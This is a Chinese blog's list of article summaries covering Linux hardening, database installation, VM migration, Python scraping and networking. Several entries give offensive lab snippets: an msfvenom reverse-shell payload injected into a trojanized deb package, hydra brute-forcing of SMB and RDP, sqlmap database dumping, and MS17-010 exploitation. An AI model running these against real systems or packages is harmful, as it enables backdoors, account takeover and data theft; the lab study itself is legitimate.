- 博客(51)
- 收藏
- 关注
RSS订阅原创 Linux系统等保三级安全加固执行手册(Reaht&Centos&Kylin)
Linux系统安全加固方案摘要 本文提供了Linux系统安全加固的完整方案,主要包括四大方面: 认证口令加固:设置口令复杂度要求(最小长度10位,包含大小写字母、数字和特殊字符)、密码有效期(最长90天,最短7天)、会话超时(300秒无操作自动退出)和登录失败锁定机制(5次失败锁定10分钟)。 用户权限管理:创建三权分立用户(系统管理员、安全员、审计员),禁止root直接登录,限制只有wheel组成员可su到root,并配置sudo权限。 日志审计配置:启用auditd和rsyslog服务,配置详细审计规则
2025-08-18 23:26:47
728
原创 达梦数据库DCA通关宝典,数据库管理运维学习
本文详细介绍了在Kylin Linux系统上安装达梦数据库DM8企业版的完整流程。主要内容包括: 安装前环境配置 创建dmdba用户及组 设置系统参数 挂载安装镜像 配置安装目录权限 两种安装方式 命令行安装:通过./DMInstall.bin -i命令交互式安装 图形化安装:需配置X11转发显示图形界面 数据库实例部署 创建数据目录并授权 使用dminit命令初始化数据库实例 注册数据库服务为系统服务 环境变量配置 配置.bash_profile添加DM相关路径 使环境变量生效 整个流程涵盖了从基础环境准
2025-08-18 23:23:38
763
原创 VMware虚拟机迁移至OpenStack骨灰级万能操作方法
本文介绍了将VMware虚拟机迁移至OpenStack云平台的详细步骤。主要内容包括:1)为Linux和Windows系统在线添加virtio驱动的方法;2)准备VMware虚拟机磁盘文件;3)在OpenStack中创建空白卷并构建云主机;4)通过转换磁盘格式(vmdk→raw)替换云主机磁盘文件完成迁移。文中提供了具体的命令行操作和详细图示,涵盖了驱动检查、安装、磁盘转换等关键环节,并指出了可能遇到的启动问题及其排查方向。该方案支持通过直接替换磁盘或镜像导入两种方式完成虚拟机迁移。
2025-08-17 19:44:31
935
1
原创 open Stack及VM虚拟机和其他平台虚拟机迁移至 VMware vSphere(esxi)虚拟化平台骨灰级后台磁盘替换法迁移方式
跨平台虚拟机迁移方案 本文提供一套无视VMware版本限制的跨平台迁移方案,支持从OpenStack/VMware迁移至其他虚拟化平台。关键步骤包括:1)收集源主机配置信息并规划目标资源;2)通过qemu-img工具转换磁盘为vmdk格式(OpenStack需提取原始磁盘,VMware可直接导出OVF);3)在目标平台创建空白虚拟机后,使用vmkfstools替换虚拟磁盘。针对启动异常问题,提出通过救援内核重建initramfs文件的解决方案。该方法突破平台限制,通过标准化磁盘格式转换和精准配置匹配实现快速
2025-08-17 19:19:46
762
原创 Python爬虫09_Requests用bs4进行数据解析
本文介绍了使用BeautifulSoup进行HTML数据解析的方法。解析原理包括标签定位和数据提取两个步骤。环境安装需要bs4和lxml库。实例化BeautifulSoup对象有两种方式:加载本地HTML文件或网页源码。文章详细说明了常用的数据解析方法,如soup.tagName、find()、find_all()和select()等,并通过示例代码展示了具体用法,包括基础标签定位、属性定位和层级选择器等操作。这些方法能有效提取网页中的结构化数据。
2025-08-05 22:57:48
349
原创 Python爬虫08_Requests聚焦批量爬取图片
本文介绍了使用Python的Requests库和正则表达式批量爬取网页图片的方法。首先通过Requests获取网页源码,然后用正则表达式分两次提取图片链接并合并。接着创建存储目录,循环请求图片链接并保存为时间戳命名的文件。文章还详细解析了正则表达式的使用,包括基本语法、分组捕获、非贪婪匹配、断言等技巧,提供了HTML属性提取、手机号校验、日志解析等实用示例,并给出了调试技巧和常见注意事项。通过预编译正则表达式和合理使用匹配方法,可以高效实现网页数据的批量抓取。
2025-08-05 22:51:42
482
原创 Python爬虫07_Requests爬取图片
本文介绍了Python爬取网络图片并保存的方法。首先通过requests库获取图片二进制数据,使用当前时间戳作为文件名保存到本地。重点解释了必须使用二进制方式(.content)获取图片数据的原因:图片是原始字节流而非文本,任何字符编码都会破坏数据完整性。通过二进制下载和写入('wb'模式)才能1:1还原图片文件。文中还演示了时间戳与可读时间的相互转换,为自动化爬取提供了完整解决方案。
2025-07-31 22:19:59
733
原创 Python爬虫06_Requests政府采购严重违法失信行为信息记录爬取
通过 requests 库抓取政府采购网违法失信记录页面(http://www.ccgp.gov.cn/cr/list),直接获取 HTML 表格数据并保存为本地文件;后续可用正则提取企业名称、代码、地址等字段,流程简洁。
2025-07-31 22:08:52
221
原创 Python爬虫05_Requests肯德基餐厅位置爬取
本文展示了一个使用Python爬取肯德基门店位置信息的代码示例。通过requests库发送POST请求,以"武汉"为关键词从肯德基官网获取门店数据,并将返回的JSON结果保存到本地文件中。代码包含请求参数设置、请求头添加、响应数据处理和文件存储等完整流程,最后输出完成提示。该脚本可用于收集特定城市肯德基门店信息。
2025-07-30 23:55:22
287
原创 Python爬虫04_Requests豆瓣电影爬取
本文介绍了爬取豆瓣电影排行榜数据的Python代码示例,并重点阐述了爬取数据前的页面分析技巧。代码部分展示了如何通过requests库获取JSON格式的电影数据并保存到本地。文章强调爬虫开发前必须进行详细的数据来源分析,提供了浏览器开发者工具的四大面板(Elements、Network、Sources、Application)的使用指南,以及常见数据获取方式的对照表。核心建议是优先分析网络请求接口,HTML解析作为备选方案,遇到JS加密需逆向分析算法。文末还提供了实用的调试技巧和工具推荐。
2025-07-30 23:54:10
1109
原创 Python爬虫03_Requests破解百度翻译
本文介绍了如何通过Python爬取百度翻译数据,并分析了服务器返回的响应数据类型。代码示例展示了使用requests库发送POST请求获取JSON格式的翻译结果并保存为文件的过程。文章将响应数据分为四类:文本类(如HTML、JSON)、二进制类(如图片、视频)、压缩/编码数据以及空数据,并解释了如何通过Content-Type和Content-Encoding头字段判断响应类型。这些知识对处理各类网络请求响应具有实用价值。
2025-07-29 17:32:00
908
原创 Python爬虫02_Requests实战网页采集器
摘要: 本文介绍了HTTP请求伪装与报文解析技术。UA伪装通过修改User-Agent请求头(如模拟Firefox浏览器)规避反爬机制,并给出Python代码示例。HTTP请求报文由起始行(方法、路径、协议版本)、请求头(Host、Content-Type等关键字段)及可选消息体(POST/PUT数据)组成,文中通过表格对比常见请求头作用,并展示完整JSON请求示例。两者结合为爬虫开发与接口调试提供实用指导。 (字数:149)
2025-07-29 16:27:33
612
原创 Python爬虫01_Requests第一血获取响应数据
这段代码演示了使用Python的requests库发起HTTP请求并获取网页数据的过程。首先指定目标URL(7k7k.com),然后通过requests.get()方法发送请求并获取响应对象。接着提取响应文本内容并打印输出,最后将获取的HTML数据以UTF-8编码保存到本地文件(e:/Reptile/sogou.html)中。整个流程包括URL指定、请求发送、数据获取和存储四个主要步骤,实现了一个简单的网页数据爬取功能。
2025-07-29 16:04:49
265
原创 Msfvenom制作deb软件包生成后门
一、下载正常软件包apt --download-only install freesweep //下载但不安装软件包freesweep二、复制到root用户加目录下为了便于后续操作,复制该软件包到root用户加目录下默认apt下载后软件包位置路径为:/var/cache/apt/archives/四、解压软件包将deb包解压五、生成恶意代码到软件源文件中msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tc
2021-08-13 16:28:01
866
原创 Metasploit工具框架介绍
一、Metasploit介绍Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有
2021-08-09 00:58:24
1149
原创 Sqlmap的基础使用
sqlmap使用方法:测试环境为Kali2021自带的sqlmap工具,目标为靶场环境。1、获取后台所有库sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ --dbs执行效果如下:已成功获取到所有库名2、获取对应库中的表sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ -D cms --tables执行效果如下所示:已成功获取到指定库的所有表信息3、获取对应库以
2021-07-28 18:54:26
375
原创 Hybra爆破工具应用
hydra 远程破解工具一、常用参数:-l 后面跟着 具体的用户名-p 后面跟着 具体的密码-L 后面跟着 用户字典-P 后面跟着 密码字典二、案例展示1、爆破smb服务hydra -l Administrator -P pass.txt smb://172.172.11.2092、爆破3389远程桌面hydra -l Administrator -P pass.txt rdp://172.172.11.209 -V3、一般爆破RDP最后别选择多进程、多线程hydra -l Adm
2021-07-27 21:09:50
881
原创 Centos环境下安装Docker环境
Docker 目前支持 CentOS 7 及以后的版本 。 系统的要求跟 Ubuntu 情况类似, 64 位操作系统,内核版本至少为 3.10 。首先,为了方便添加软件源,以及支持 device mapper 存储类型,安装如下软件包:
2021-07-26 21:57:34
415
原创 mysql数据库所有基本操作语句
一、库的操作1、查看所有的数据库名称Show databases;2、创建新的数据库Create database test;3、查看数据库的属性show create database test;4、进入数据库use test;5、删除数据库drop database tes1t;二、数据表的操作1、查看当前数据库下所有的数据表名称Show tables;2、创建新的数据表Create table 数据表名(字段名);例: create table tb_dem
2021-07-26 21:41:15
1365
原创 HC120115003 OSPF外部路由
一、外部路由计算过程1、外部路由引入在图中,RTA上配置了一条静态路由,目的网络是10.1.60.0/24,下一跳是RTF。在RTA的OSPF进程下,将配置的静态路由重发布到A公司的OSPF网络中,其中引入外部路由的OSPF路由器叫做ASBR(设备间互访需要路由双向可达,这里仅介绍OSPF网络内获取外部路由的过程)。RTA会生成一条AS-External-LSA(五类LSA),用于描述如何从ASBR到达外部目的地;RTB和RTC会生成一条ASBR-Summary-LSA(四类LSA),用于描述如
2020-10-29 01:41:57
667
1
原创 HC120115001 OSPF域内路由
OSPF中LSA的类型主要有:1、Router-LSA1、Router-LSA描述P2P网络每台OSPF路由器使用一条Router-LSA描述本区域内的链路状态信息。LSA头部的三个字段含义如下:(1)Type:LSA类型,Router-LSA是一类LSA。(2)LS id:链路状态ID。(3)Adv rtr:产生此Router-LSA的路由器Router ID。一条Router-LSA可以描述多条链接,每条链接描述信息由Link ID,Data,Link Type和Metric组成,其关键
2020-10-16 21:44:15
431
原创 HC120115000 OSPF协议基础2_(OSPF基本工作原理)
1、邻居建立过程1、Route-id的标识设备在网络中运行了ospf,需要有一个标识来唯一的确定他的存在,相当于给设备起一个名字,这个名字就叫做Router-id,名字不能相同,Router-id在同一个网络环境中也不能相同,Router-id会在进行邻居建立以及路由更新时唯一的标识路由器的存在。Router-id的选举:(1)以手工配置的为最优。(2)以双UP状态的逻辑接口次之。(3)最后选择双UP状态的物理接口。实际在ensp当中,关于router-id的选择,会首先选择最开始配置的路由器接口
2020-10-16 14:23:16
850
原创 HC120115000 OSPF协议基础1_(RIP在大型网络中部署面临的挑战)
1、大型网络所发生的变化网络规模的扩大随着企业的扩张,网络规模同样处于不断的扩展当中,包括设备数量的增加,业务系统的层出不穷,部门以及分支机构的增加等。网络可靠性要求提高各种应用程序对网络可靠性要求越来越高,网络发生故障后,需要在更短的时间内恢复正常。网络异构化,多厂商设备互联需求在日常的运营维护中,硬件设备不断升级或更新,不同设备之间性能差异较大,设备间互连链路带宽也存在一定的差异。每个企业中的网络设备都不会是单一厂商的,所以会涉及到多厂商设备互联的情况。需要加以解决,这里就需要一种各厂商均
2020-10-16 10:12:24
402
原创 Sqlilabs-Less-1
已根据提示访问主页并且携带ID号信息进行提交,得出如上图所示界面。http://192.168.85.140/sqlilabs/Less-1/index.php?id=11、判断注入点执行中可以看出,是通过get方式提交的参数,可以选择在url栏目中添加注入判断语句进行探测,输入 id=1 and 1=1...
2020-04-18 02:39:09
428
原创 IPsec实验
1、完成基本路由R1:int f0/0ip add 100.1.1.1 255.255.255.0no shutdownint lo 0ip add 192.168.10.1 255.255.255.0ip route 0.0.0.0 0.0.0.0 100.1.1.2R2:int f0/0ip add 100.1.1.1 255.255.255.0no shutdown...
2020-04-15 17:12:33
1735
原创 Windows MS17-010漏洞利用介绍
利用metasploit开源安全漏洞检测工具实现漏洞检测及利用1、metasploit介绍------Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。-...
2020-04-11 00:46:47
4627
2
原创 Windows 基础指令
color 改变cmd颜色ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig 查看ipipconfig /release 释放ipipconfig /renew 重新获得ipsysteminfo 查看系统信息arp -anet view 查看局域网内其他计算机名称Shutd...
2020-04-10 11:32:01
583
1
原创 Windows系统目录、服务、端口、注册表
1、系统目录windows:是Windows系统安装文件所在文件夹,一般用来存储系统安装文件和硬件驱动程序等内容,是系统正常运转的必要保证。program files:指的是程序文件,是Windows 操作系统、以及其它的操作系统各种软件默认安装到的目录。位于C盘分区(“C:\Program Files”,"%ProgramFiles%"),但也可根据用户的需要自定义到别的分区。用户:存放...
2020-04-10 10:22:04
1714
原创 GRE隧道构建
1、底层信息配置通,IP地址配置R1:interface Ethernet0/0 ip address 192.168.1.1 255.255.255.0interface Ethernet0/1 ip address 13.0.0.1 255.255.255.0R2: interface Ethernet0/0 ip address 23.0.0.2 255.255.255...
2020-04-02 21:15:12
1122
原创 安装kali Linux
本次安装以kali 2018版本进行演示:1、kali安装包获取,进入kali官网https://www.kali.org/,进入downloads界面中,选择合适的版本进行下载,官网中给定的都是最新的版本。如果需要下载其他历史版本,可以到站点http://old.kali.org/kali-images/当中进行下载。官网提供下载的界面中,分别有kali的原版镜像版,还有对应的虚拟机版...
2020-04-01 20:58:17
1408
原创 Linux-网络服务及计划任务
1、网络设置Redhat 7之前网卡的命名为eth0等形式的名称,从Redhat 7开始即命名成为了ens33格式,因为虚拟化技术发展的原因,所以会根据Redhat中ip等信息生成唯一的名称。网口形式:eh0、ens33对应物理接口的网卡,也可以是eth0:1子接口形式,默认也会存在环回口。网络配置文件:/etc/sysconfig/network-scripts/ifcfg-ens33...
2020-04-01 14:31:25
611
原创 Linux-login VS non-login shell and standard Input Output
1、登录shell采用快捷键登录进去的shell,所有采用名字和密码登录的shell采用图形化登录进去的shell采用su - 切换的登录shell2、非登录shell采用su登录用户的shell打开的一个终端,即打开的一个控制界面执行的脚本时采用非登录shell方式执行的any、other、bash、instances其他一些bash情景3、登录shell于非登录she...
2020-03-15 00:24:31
223
原创 Linux-环境变量、特殊符号
一、环境变量1、环境变量,全局下的环境变量(1).在Linux中显示命令提示符“#”或者“”的功能是由变量"”的功能是由变量"”的功能是由变量"PS1"决定的,该变量文件存放于/etc/bashrc中,采用echo可以输入该变量对应的值:echo $PS1。(2).HISTSIZE变量用于定义history命令历史记录条目数量的全局变量,该变量存放在/etc/profile中,可进行查看:...
2020-03-14 23:56:21
4200
原创 Linux-CentOS 7.4密码恢复
~前面讲到了CentOS6当中的密码破解,在升级到7后,对于破解的方法有了一定的改变,下面一起来看看吧!!!将忘记密码的CentOS7操作系统进行重启,重启过程中在系统进行引导时通过键盘任意按键让系统停止进入到默认的启动选项中,最终定格在如下图所示界面,并且在该内核界面敲击字母“e”。在如下界面中,找到开头为linuxl6的这行,如无直接显示,可通过上下翻页进行查找,在改行末尾处加上\r...
2020-03-11 15:26:11
489
原创 Linux-tar文件打包与压缩
.在文件的整理及传输过程中,经常会用到将文件或者文件夹通过打包压缩的方式整理成为一个归档的文件, Windows中用到的压缩解压工具有很多,并且很方便,但是在Linux当中呢,可能会稍微复杂一点,并且方式同样是多样化的。Linux中主要出现的压缩格式及方法如下:文件后缀功能说明*.zipzip程序打包压缩的文件*.rarrar程序打包压缩的文件*.7z...
2020-03-11 15:21:04
6304
1
原创 Linux-CentOS 6.6密码重置和防护
!!!!!!在操作系统使用过程中,难免会有忘记登录密码的情况出现,特别是对于Linux操作系统来说,作为服务器操作系统来说,很多时候都没有必要频繁去执行登录操作,时间长了就会忘记原本的登录密码了,重装系统对于正在运行的业务系统来说肯定是不可能的,这个时候就需要破解登录密码了,其实在Linux操作系统中有自己的密码恢复机制,Linux6.0及之前的版本,密码恢复的过程都是差不多了过程,但是在7...
2020-03-11 14:40:02
654
原创 Linux-vi/vim编辑器的使用
vi/vim编辑器的使用vi(vim)是Linux上非常常用的编辑器,很多Linux发行版都默认安装了vi/vim。vi/vim命令繁多但是如果使用灵活之后将会大大提高效率。vi是“visual interface”的缩写,vim是vi IMproved(增强版的vi)。在一般的系统管理维护中vi就够用,如果想使用代码加亮的话可以使用vim。vi/vim有3个模式:插入模式、命令模式、低行模...
2020-03-11 01:12:03
425
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人